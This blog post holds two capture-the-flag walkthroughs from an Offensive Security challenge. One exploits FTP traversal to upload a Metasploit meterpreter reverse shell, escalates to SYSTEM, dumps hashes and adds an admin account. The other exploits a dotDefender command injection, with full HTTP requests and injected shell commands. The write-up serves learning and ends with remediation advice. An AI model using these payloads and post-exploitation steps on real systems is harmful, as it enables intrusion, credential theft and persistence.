Monday, May 10, 2010

Offensive Security Part 2 -- KilltheN00b Walk Through

How Strong is Your FU hacker challenge Part 2

Target 2: KilltheN00b

After some chips, salsa and a supersized burrito from el habinaro i was down for anouther challenge. I logged into the offsec labs and reviewed some of the documentation on the contest page that stated there were 2 targets.

Killthen00b
Ghost

After a quick portscan I chose to attack killthen00b purely based on the amount of open ports available on the system. Ghost provided port HTTP only. KilltheN00b had various ports open including FTP, HTTP and some various mail ports.

Scan output:
21/tcp   open  ftp
|_ftp-anon: Anonymous FTP login allowed
25/tcp   open  smtp          Surgemail smtpd 3.8k4-4
80/tcp   open  http          Surgemail webmail (DNews based)
|_html-title: SurgeMail Welcome Page
106/tcp  open  pop3pw        Qualcomm poppassd (Maximum users connected)
110/tcp  open  pop3          SurgeMail pop3d 3.8k4-4
143/tcp  open  imap          SurgeMail imapd 3.8k4-4
366/tcp  open  smtp          Surgemail smtpd 3.8k4-4
465/tcp  open  tcpwrapped
587/tcp  open  smtp          Surgemail smtpd 3.8k4-4
993/tcp  open  tcpwrapped
995/tcp  open  tcpwrapped
3389/tcp open  ms-term-serv?
7025/tcp open  tcpwrapped
7443/tcp open  tcpwrapped



More ports = = more fun ??
More Targets = = more fun??
All Girls Just want to have fun?? Wait no that's a song LOL

Probably a wrong assumption, but its a good theory to cling to when things get rough


Initial FTP probing:
First thing i did was log into the FTP server with credentials that were provided on the offsec page. After logging into the FTP server there wasnt much to play with in any  available directories so i decided to try to hop out of the FTP environment.

I tried to hop out of the ftp directory structure via directory traversal attacks with "cd ../../../../../"... Failed, so I then flipped the slashes to "cd ..\..\..\..\..\" and the response back indicated a fail. So i decided to directly call the root directory with "cd c:". 

Score

Cd C:  correctly hopped me into a directory with loads of files available. I also seemed to be able to browse to a directory with system32 files. My actual first thought was to replace the system32 directory program Magnify.exe with my evil payload so that at the Remote desktop login  the accessibility options would become a shell. But unfortunately I didnt have access to write to that directory so i moved on. After browsing files for awhile I decided this ftp session was a bust and logged out.

HTTP:
Next I decided to hit up the web page located on KilltheN00b. The webserver indicated an application by the name of "surgemail".

Also i noted the scripts directory on this site seemed to execute pages with a EXE extension. Very interesting...

I then checked the exploit databases and verified an exploit for the version of surgemail running that was valid for windows 2000 and 2003.

Debugging:
 Next I decided to check the remote desktop port to find out killthen00b was running a Win7 operating system and the exploit would need modification before it would work.  This was a

TOTAL FAIL

I loaded up the debugger and started modifying the exploit and realized that I was unable to control EIP after a bit of wrestling with the exploits located on exploitDB... Either due to my lack of advanced level exploitation or the differences in operating systems or its protection mechanisms i only had control of certain parts of the stack but no EIP overwrite. To be correct, rather partial overwrite of EIP in this exploit which utilized the OS already providing a zero byte on the first byte of the 4 byte EIP to bypass filters on insertion the overflow utilized what was already present, (I like that) otherwise our null stop execution of the program prematurely.

Before going further with this I realized this exploit was a post authentication exploit and would need a user account. grrrr

More Web:
 I browsed around the the surgemail pages for awhile trying attacks against authentication and authorization without much success till i hit a /domainadmin management page. On this page i was able to guess a password of test/test using burp "comparer" to compare my responses and noticed one of the outputs said "Account Details". I then verified that I could log into the server by logging into another port used for changing passwords "poppassd" located on port 106.  The found login worked,

Woot i could now use that exploit if i can get the exploit to work.. however this was still a fail after messing with it for a few hours. 

Back to FTP:
After noticing the EXE files with a possible execution on the webpage i decided to hit the FTP session back up and see if I can get to the scripts directory. After messing around for awhile I realized that the "cd ..\..\" actually was working and after a few iterations got me to the root directory. I browsed to the surgemail/scripts directory

ftp> cd ..\..\..\
250 Directory changed to "/MyDocuments/............./......../......".
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for listing
dr-xrwx--- 1 admin users              0 May 03 22:58 $Recycle.Bin
dr-xrwx--- 1 admin users              0 Jul 13 2009 Documents and Settings
dr-xrwx--- 1 admin users              0 Jul 13 2009 PerfLogs
dr-xrwx--- 1 admin users              0 May 03 19:20 Program Files
dr-xrwx--- 1 admin users              0 May 03 19:21 ProgramData
dr-xrwx--- 1 admin users              0 May 03 22:51 Python26
dr-xrwx--- 1 admin users              0 Apr 30 01:21 Recovery
dr-xrwx--- 1 admin users              0 May 07 23:48 surgemail
dr-xrwx--- 1 admin users              0 May 03 22:38 System Volume Information
dr-xrwx--- 1 admin users              0 May 07 23:48 Users
dr-xrwx--- 1 admin users              0 May 03 21:28 Windows
-r--rr---- 1 admin users             24 Jun 10 2009 autoexec.bat
-r--rr---- 1 admin users             10 Jun 10 2009 config.sys
-r--rr---- 1 admin users     2147016704 May 07 23:44 pagefile.sys
-r--rr---- 1 admin users       12645888 May 03 05:53 surgemail_installer.exe
ftp> cd surgemail
250 Directory changed to "/MyDocuments/............./......../....../surgemail".
ftp> cd scripts
250 Directory changed to "/MyDocuments/............./......../....../surgemail/scripts".

I then tried uploading a test file and it worked.... at this point i got pretty excited and went into explotation mode.


Meterpreter Evil.exe:
I now i needed an evil EXE file to have the webserver serve up for me on behalf of the killtheN00b host. So i popped open metasploit..

Create a reverse_tcp meterpreter shell.
root@ficti0n:~# cd /pentest/exploits/framework3
root@ficti0n:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.142 LPORT=4444 X > evil.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=192.168.6.142,LPORT=4444

Now we have our test shell to try, which I then uploaded to the ftp server in the surgemail/scripts directory this directory also contained other exe files such as webmail.exe


Back to the web part 2: the evil upload

Back on the web it was time to browse to the scripts directory and cross my fingers and toes, along with yelling at my friends to cross their fingers and toes too!!!  Very important that all the bases are covered in information security..


Offensive Security in depth!!!  or something like that.. (Wishful thinking)

So i started a multihandler for metasploit first, just in case the reverseshell worked.
msf > use multi/handler
msf exploit(handler) > set LHOST 192.168.6.142
LHOST => 192.168.6.142
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.142:4444
[*] Starting the payload handler...
                                     
I then proceded to browse to the directory with all bodyparts crossed.....Hoping for connect back

SCORE!!!!!

My connection status in metasploit then indicated i had an open session.  :)

Post Explotation:
With a shiny shell in hand I first dropped the hashes via meterpreter hashdump but i noticed from the sequence of charactors the LM hashes were blank.  So I decided to just create my own user using the following scenerio.

Get higher privilages:
meterpreter > getsystem
...got system (via technique 1).


Add a new domain admin:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > add_user ficti0n
[*] Attempting to add user ficti0n to host 127.0.0.1
[+] Successfully added user
meterpreter > add_localgroup_user Administrators ficti0n
[*] Attempting to add user ficti0n to localgroup Administrators on host 127.0.0.1
[+] Successfully added user to local group

But i like GUI's so lets get remote desktop, and I noted in an earlier attempt to log into window with my ftp credentials that i needed to be part of the remote desktop users group.. so lets be part of the cool kids group shall we??

Get a Remote Desktop Gui:
meterpreter > add_localgroup_user "Remote Desktop Users" ficti0n
[*] Attempting to add user ficti0n to localgroup Remote Desktop Users on host 127.0.0.1
[+] Successfully added user to local group

SCORE I can now login with domain admin on a pretty gui interface provided by microsoft.. Thanks microsoft :)  and thanks metaploit.

After logging into the windows7 machine I quickly found my proofs.txt and added it to the online scoreboard to raise me up to 50pts total.  Job well done...Thanks to steponequit and carnalownage and sygog for calaborating on attack possibilities, sometimes multiple minds work better even if its not the solution possibilities for the future arise



Lessons Learned:
-Dont listen to other peoples chatter and take it as truth.While I was in IRC everyone was talking about compiling code and getting payloads correct..
-I knew better, I knew there was an easier way and only wasted a limited amount of time on exploit writing. I am sure there is a way to transfer that exploit but messing around all day isn't going to get me past the challenge.
-Again go with your initial observations of the application. My observation that the webpage was executing EXE files ultimately got me into the application even though i veered off the path for awhile listening to people in the IRC chat about payloads.
-Also again always trying things twice and CONFIRM.... Initially i thought i didn't have the traversal. it turns out i did 3 hours before I used it!

Remediation:
-Check the ACL's and the Jails on your FTP servers and make sure they are not traverseable.
-Review your applications for any known exploitable 3rd party software and update
-Do antivirus checking on file uploads to stop payloads from being uploaded and executed
-Do egress filtering to stop unnecessary ports from calling back to listeners on attackers machines

Get a HUGE security budget and hire me to run all your penetration tests for twice your average cost!!! Preferably from the beach externally :) Dont forget to add redbull and sourpatch kids to the budget!!!  They are ESSENTIAL to my findings.


Closing notes:
I then went to the gym to wake up my forgotten muscles from sitting around all day and night... This was over 24 hours into this Challenge, I cheated and took a little (LONG)  nap somewhere in there too.. I know I know.. sleeping on the job, but hey there was a pillow close by and I ran out of the redbull..


Up next:  Part 3
Dropping shells on the Ghost and watching him laugh as he ultimately owns me!!!! 



Offensive Security n00bFilter Walk Through

How Strong is Your FU hacker challenge

Target 1: N00bFilter

The first target in this weekend’s offensive security challenge was nicknamed n00bfilter as it was used to weed out all the n00bs who would plague the internal Offsec networks with high bandwidth unnecessary tools such as Nessus or Webinspect hoping for an easy hit. Tools like these, while useful, are not going to directly aid you in exploitation of this CTF challenge. Your BRAIN is the only valid tool in an offsec challenge. At first glance n00bfilter appears to be a login and password prompt to an application with no other available options but username and password. Source looks pretty standard as well.. Nothing special, no JavaScript or includes to be had.




First Clue: Error Message

Like most pentests your first inclination would be to post a single quote or random character into the field and see if it errors out. After adding a single quote I was presented with a taunting answer of "HAHAHA" rather than the expected sql error or perhaps invalid character. Upon further inspection of the error pages source code it was noted that this was an Applicure error message. Applicure being the vendor of Dot Defender a well known Web Application Firewall (WAF). I found it interesting that a n00bfilter would be running an ids/ips product and started performing further probing of the application.


Annoyance: cool out periods

I then started trying default user/pass combinations such as admin/admin admin/password. Anything that a normal administrator would FAIL to implement changes to. This led me nowhere quickly at which time I started losing my connection to the application.  After roughly 5minutes i was back online and figured my internet connection was foobarred... Got to love sketchy cable connections right?? I swear they do bandwidth limiting but whatever.. LOL   A few minutes later I was blocked again, and again, and again.... Apparently Dot Defender was set to "Cool me down” when I got out of control.... Very NOT COOL..... This annoyed me becuase I was manually probing the application. This application also appeared to vary its cool outs based on what you were doing, messing with the URL, messing with the input fields, certain characters, some may be ok others blocked you immediately, then sometimes after a few tries... Interesting the application has a personality apparently.


Thought: Dot Defender bypass

When I started getting owned by dot defender over and over again I started to think maybe I have to shut the WAF down or at least add my IP address to a list of friends within the dot defenders configurations. But how??
I immediately started researching dot defender weaknesses and vulnerabilities on my good friend Google and this was found...

Full Disclosure:
http://seclists.org/fulldisclosure/2009/Nov/357
The above link states that Post Authentication there is a vulnerability that allows an attacker to run commands on the operating system via the delete site method. Hmmm “post authentication”. This means I need credentials, bullocks!! I don't have credentials

Ok back to google, the google gods then provided me with a few tidbits of information regarding Dot Defender, one useful piece of information being that DotDefender site manager was located a /dotDefender. I browsed to this address and sure enough I was prompted with a basic authentication login prompt that told me its username was "Admin". Now I have a login name the struggle is half over right? so i tried all the default password combos and a few random passwords based on the site and the challenge.

FAIL

Dont Second Guess yourself:

Figuring that a vulnerability on full disclosure was not going to be the issue and especially being post auth on a n00bFilter I moved back to probing the app... I went at it for awhile with combination's of character encodings and character assembly that might fool the WAF into either letting my attacks through the firewall or removing just enough of the attack to reassemble the attack for me.. Attacks such as <scr><script>ipt> or other combination's using various
encoding techniques...

Again FAIL!!


Social Networking:

So I remember the hints said to stay in touch via twitter and IRC. I pop up the IRC channel and its a bunch of whiners complaining about a password being changed.. I was just thinking “WHAT PASSWORD”. I felt out of the loop at that point but I know better then to ask Muts a direct question, I already know the answer.. “TRY HARDER”  this is offensive securities mantra which answers every inquiry. So instead I got some redbull and thought it over for a few and noticed that the IRC channel said the passwords were now reset to the original values.


Dot Defender again:

Knowing that the only password not behind dot defenders tyrannical rule was the basic auth login for dot defender, i decided gave Dot Defender a second go. The very first combination I tried popped open the application with the password of  “password” and a # symbol at the end of the index page value, someone had suggested I try the # earlier.

Apparently the first few people past the login started changing the password to keep others from catching up to them.... Sneaky little terrorists threw me off my game. So now it was time to try my post authentication exploitation from full disclosure.. :)




Post Auth:
Opening up Burp Proxy a well known application proxy I started browsing the Dot Defender site manager. I was presented with a page that allowed me to add and DELETE sites. I created a fake test site and then set my proxy to capture a request. Once I captured a request I sent it over to a module in burp by the name of “repeater”, repeater allows you to keep making the request over and over again manually manipulating the values. Since I had an example delete request and I had the delete example on the full disclosure vulnerability, I modified my request with the vulnerable values.


POST /dotDefender/index.cgi HTTP/1.1
Host: www1.noob-filter.com
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www1.noob-filter.com/dotDefender/index.cgi
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 137


sitename=testsite&deletesitename=testsite;id;ls -al;
pwd;&action=deletesite&linenum=12


In the web response was the output of my command injection. I injected an “ls” command which in unix lists the contents of a directory. I thought to myself, ok so that’s cool but I need to find a certain file to show that I passed the challenge. Running burp requests looking for this file is waaaaay to tedious for me. So I used another familiar unix command. The “find” command.

sitename=testsite&deletesitename=testsite;id;find / -name 'n00bSecret.txt';pwd;&action=deletesite&linenum=12

Score:
The n00bSecret file was found quickly so I used the “cat” command to list out the contents of the file with the proof of passing the first challenge.

Request:
sitename=testsite&deletesitename=testsite;id;cat /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt;pwd;&action=deletesite&linenum=12
 
Response:
9f9b0b7d2db411c10b517b547a8693d831d3aa936aba4d54b51d30b5a182c05b1f7a5759fd7d5ef64e5485e5d3e3a214dd6b4b78a733566556b2887a6b9a6299


I browsed out to the contest scoreboard page and added in my shiny new proof key imediatly since I knew there was a 10 minute time limit between exploitation and acceptance. Accepted 25 points added to my account and a shiny new VPN login will be provided to me within 5 minutes time!!!


Mexican food:
At this point I decided it was time for some Mexican food, I was fiendish for some chips and salsa all day long. I passed the n00b challenge being the 30th contender out of a possible 100 slots. Note that the 100 slots were not filled till 24 hours after this point.. :)    Not too horrible but again could be much better!!

Lessons Learned:

Dont second guess your observations and research. I was thrown off the path because sneaky contestants were changing the scope of the competition. Observe every detail of the source and what you are presented with and try things more than once! They just might work the second time... At this point 5 hours of the competition were wasted on something that should have taken me less than 2 hours. Or even 30 min if I was quick with it.

Dot Defender Remediation:

There is a patch available for this vulnerability from Applicure, just patch your app!! Also according to this other post by Applicure it only effects Linux running Apache. Response by Applicure in the link below.
http://seclists.org/bugtraq/2009/Dec/123


Next up, how to own killthen00b